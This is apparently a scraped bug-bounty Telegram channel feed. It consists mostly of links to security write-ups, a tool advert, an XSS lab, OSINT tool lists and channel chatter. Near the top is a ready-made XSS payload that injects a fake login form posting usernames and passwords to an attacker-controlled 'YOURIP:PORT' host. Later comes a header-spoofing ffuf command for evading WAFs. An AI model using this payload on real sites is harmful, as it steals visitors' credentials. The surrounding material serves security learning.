2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96" rel="nofollow">https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get a real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱Github: 🔗Link
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
Please do boost the channel so that you guys can enjoy other features.
Читать полностью…
Exploring Deserialization Attacks and Their Effects
https://haymiz.dev/security/2024/09/07/deserialization-attacks/
A very easy bug anyone can find: malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5
Читать полностью…
How to Find IDOR Vulnerabilities: A Guide for Bug Bounty Hunters and Developers: https://cyberw1ng.medium.com/how-to-find-idor-vulnerabilities-a-guide-for-bug-bounty-hunters-and-developers-3d2ba2a766f5?source=rss------bug_bounty-5
Читать полностью…
Automating the CORS Vulnerability Scan: https://angixblack.medium.com/automating-the-cors-vulnerability-scan-66d57752cc36?source=rss------bug_bounty-5
Читать полностью…
How i got 100$ bounty: mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5
Читать полностью…
Subdomain Takeovers for Beginners: hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5
Читать полностью…
🔖JavaScript for hackers: Learn to think like a hacker
🖥 Book Details: 🔗Link
👤 Author: Gareth Heyes
#infosec #cybersecurity #hacking #pentesting #security #book #pentest #BugBounty #BugBountyBooks
🔹 Share & Support Us 🔹
💬 Channel : @Hide_Club
Xss lab: https://brutelogic.com.br/gym.php
https://brutelogic.com.br/gym.php?p=gitbook
30 level
NUCLEI101 FOR BUG BOUNTY CHEATSHEET
Sun, 18 Jun 2023 17:07:46 GMT
https://medium.com/p/3eaf3c35b39
Read this book after owasp top 10
You will learn more vulnerabilities
1 page in 1 day
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643" rel="nofollow">https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643
try this amazing FFUF Oneliner that i use mostly to bypass WAfs and for good & refine results for information disclosure bugs. you can use any wordlist:
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "X-Forwarded-For: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-Host: localhost" -t 100 -r -o results.jsonЧитать полностью…
First IDOR
Severity : critical 9-10
Eg : exmaple.com/parameter.aspx?id=4471
SQL Injetion: adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5
Читать полностью…
BugBounty platforms List: loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5
Читать полностью…
Live Bug Bounty & Penetration Testing on Real Websites: Step-by-Step Guide (Part 1): shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5
Читать полностью…
Hunting for Corporate Accounts: Exploiting IDOR and Parameter Pollution in Web Applications: tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5
Читать полностью…
XSS — Cross Site Scripting: codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5
Читать полностью…
😈 [ Scott Sutherland @_nullbind ]
[BLOG] Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation
🔗 https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/
🐥 [ tweet ]
Guide to Using Nuclei: learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@learntheshell/guide-to-using-nuclei-9c37869be30e?source=rss------bug_bounty-5
Читать полностью…
7 free online #OSINT Tools
GHUNT - Google account info
Sherlock - nickname enumeration
Holehe - search accounts by email
Ignorant - search accounts by phone
Whois domain lookup
WhatsApp profile info
HudsonRock - email leaks lookup
osint.rocks
Tip by twitter.com/0xtechrock
@OsintGit
What a morning🫡
I started this channel last year in the name of "BugBounty tips by cipherops.xyz"
It took me total of 10months to reach 1k subscribers, but I was happy when I saw that and it took me just 1 month to get 500 subscribers.
All you need to do is just start😄
The best thing of this year..... 💓💓